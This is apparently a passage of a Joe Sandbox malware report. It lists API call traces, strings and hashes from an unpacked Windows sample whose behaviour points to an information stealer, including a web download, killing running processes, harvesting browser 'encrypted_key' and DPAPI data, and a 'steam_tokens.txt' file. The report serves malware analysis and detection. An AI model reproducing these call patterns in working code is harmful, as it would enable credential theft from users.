                                • LocalAlloc.KERNEL32(00000040), ref: 006C9EA7
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                • lstrcpy.KERNEL32(00000000,006F4C48), ref: 006C9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: 00d41ed17307c79e6d5102f3ba2208256697a40ffe62288737dff7b011c4a361
                                • Instruction ID: 3b3a092f52f081df03ae0017fc75f076336b99bae43341a56a06408398bf297c
                                • Opcode Fuzzy Hash: 00d41ed17307c79e6d5102f3ba2208256697a40ffe62288737dff7b011c4a361
                                • Instruction Fuzzy Hash: 2E518B71A1020A9BCB10EFA6DC89FAE77A6EF40314F15406CFD59EB251DA70ED458BA0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006C565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C5661
                                • InternetOpenA.WININET(006ECFEC,00000000,00000000,00000000,00000000), ref: 006C5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 006C5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 006C56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 006C56E1
                                • InternetCloseHandle.WININET(?), ref: 006C56FA
                                • InternetCloseHandle.WININET(00000000), ref: 006C5701
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 4aa004d3fa6ef08fdbd7c30e697b1b67e50cdd387f7bfe791bffc8ae1b15ea54
                                • Instruction ID: d90778e996a441daee2c7220ceffd7d31f05a0ee376dc5f738846214b69f6459
                                • Opcode Fuzzy Hash: 4aa004d3fa6ef08fdbd7c30e697b1b67e50cdd387f7bfe791bffc8ae1b15ea54
                                • Instruction Fuzzy Hash: 9B417F70A00605DFDB14CF65DC88FAAB7B5FF84314F14816DE5099B3A0D771A981CBA4
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006E4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 006E4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006E47AB
                                • CloseHandle.KERNEL32(00000000), ref: 006E47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E47C0
                                • CloseHandle.KERNEL32(00000000), ref: 006E47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: be8bba669652fe72219d9a60557b44d8fd85854ab92ed17baf9acc7891f50b45
                                • Instruction ID: 4ac9f4a173b18af0f42ef0ddceceb09c4132944d5e9519df3dfb383e6f718202
                                • Opcode Fuzzy Hash: be8bba669652fe72219d9a60557b44d8fd85854ab92ed17baf9acc7891f50b45
                                • Instruction Fuzzy Hash: E001B171602714AFEB205B719C89FFA77BDFB48752F000181FA49E5280EF709D90CAA0
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D846C
                                • lstrlen.KERNEL32(00000000), ref: 006D84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D84E9
                                • lstrlen.KERNEL32(00000000), ref: 006D84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D852E
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D853E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c90c81a0a637822c87bb15606ce2af882e68629931f5b5e59736d3e1b4c9949f
                                • Instruction ID: f7a339bacf2fd49f4771b8247cdb968182f50b4cb81bcef3b5ffcfa6830ba8a5
                                • Opcode Fuzzy Hash: c90c81a0a637822c87bb15606ce2af882e68629931f5b5e59736d3e1b4c9949f
                                • Instruction Fuzzy Hash: 80515F759002069FCB64DF69D899AAAB7F6EF48300F14845EEC46DB345EF30D941CB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006E2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E292C
                                • RegOpenKeyExA.ADVAPI32(80000002,00F0B880,00000000,00020119,006E28A9), ref: 006E294B
                                • RegQueryValueExA.ADVAPI32(006E28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006E2965
                                • RegCloseKey.ADVAPI32(006E28A9), ref: 006E296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 0e98a82438a44a82a161f295a2125df1859372eea060fd6c5a27ea745f3e7cdd
                                • Instruction ID: afd251aa6bf1ade88a6dfc5c8895864c7ba7a0726a53829511d51c8392b86ee4
                                • Opcode Fuzzy Hash: 0e98a82438a44a82a161f295a2125df1859372eea060fd6c5a27ea745f3e7cdd
                                • Instruction Fuzzy Hash: B3019A75600319AFD714CBA19C59FFB7BADEB88715F200098FE8597241EA715A04C7A0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006E2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E289C
                                  • Part of subcall function 006E2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006E2925
                                  • Part of subcall function 006E2910: RtlAllocateHeap.NTDLL(00000000), ref: 006E292C
                                  • Part of subcall function 006E2910: RegOpenKeyExA.ADVAPI32(80000002,00F0B880,00000000,00020119,006E28A9), ref: 006E294B
                                  • Part of subcall function 006E2910: RegQueryValueExA.ADVAPI32(006E28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006E2965
                                  • Part of subcall function 006E2910: RegCloseKey.ADVAPI32(006E28A9), ref: 006E296F
                                • RegOpenKeyExA.ADVAPI32(80000002,00F0B880,00000000,00020119,006D9500), ref: 006E28D1
                                • RegQueryValueExA.ADVAPI32(006D9500,00F20388,00000000,00000000,00000000,000000FF), ref: 006E28EC
                                • RegCloseKey.ADVAPI32(006D9500), ref: 006E28F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 5ee185ddefb7079f865c87231538006bed735e992fc715daa9b08199a7114cb3
                                • Instruction ID: 003c8248cadf155063858eee0f4506df7c555bceb9df792bcfc0819d9854cd91
                                • Opcode Fuzzy Hash: 5ee185ddefb7079f865c87231538006bed735e992fc715daa9b08199a7114cb3
                                • Instruction Fuzzy Hash: BA018F75600209AFDB149BB5AC49FBA776EFB84315F100158FE08D2250DA705944C7A0
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 006C723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 006C7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006C72C3
                                • HeapFree.KERNEL32(00000000), ref: 006C72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 006C7329
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 7a2943a10be142786de70e760ce436ef1bddc4c7562c70240392117c6b1fab5b
                                • Instruction ID: 2344191de5bc5d4969e1506b235ad5b4b1a3fdfa855d7e130fd987ca12bc3b64
                                • Opcode Fuzzy Hash: 7a2943a10be142786de70e760ce436ef1bddc4c7562c70240392117c6b1fab5b
                                • Instruction Fuzzy Hash: FC413871A05606DBDB20CFA9E884FBAB3EAFB88305F1445ADEC4DC7310E635E940DA50
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006C9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006C9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006C9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 8efe6257b2f68bd66efe586c1791fb19c30f1d16d9b8d794fe07189d5443cfae
                                • Instruction ID: d56969f9c2b8a72c9e08879006c5d6efcf65ec210c561c2268cc53082598de76
                                • Opcode Fuzzy Hash: 8efe6257b2f68bd66efe586c1791fb19c30f1d16d9b8d794fe07189d5443cfae
                                • Instruction Fuzzy Hash: 2A418D71A0060A9BCB25EFA6D849FFE77B6EF50304F04546DED1AA7352DA30AD00C7A4
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 006DEA61
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DEA7A
                                • lstrcat.KERNEL32(?,00F18A80), ref: 006DEA8D
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DEA9F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: ff8ccb134538f101d287469ad1624b5fffc948928609e768cd71f50a261a6cf7
                                • Instruction ID: 04964eb46832af2bc22f8aa21f9dde714ba923b2d1596fe57f1453894e618ab8
                                • Opcode Fuzzy Hash: ff8ccb134538f101d287469ad1624b5fffc948928609e768cd71f50a261a6cf7
                                • Instruction Fuzzy Hash: 87416FB1A10119ABCB55EBA5DC56FFD7379FF88300F40446CBA1A9B241DE709E448B94
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DECDF
                                • lstrlen.KERNEL32(00000000), ref: 006DECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DED1D
                                • lstrlen.KERNEL32(00000000), ref: 006DED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 006DED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 52712e99c4051277c393c6ca3d2101dcb048ec86ac0ac077b167efe418a041a3
                                • Instruction ID: 443c0308aeeba5afb7df67a3fbae1e8c2036d00c261fbb17ca30e03d6a844c64
                                • Opcode Fuzzy Hash: 52712e99c4051277c393c6ca3d2101dcb048ec86ac0ac077b167efe418a041a3
                                • Instruction Fuzzy Hash: E8315E71A115465BC762BBBAEC5AEBE7767EF50310F040029FC4ADB312DE25DC068785
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,006C140E), ref: 006C9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,006C140E), ref: 006C9AB0
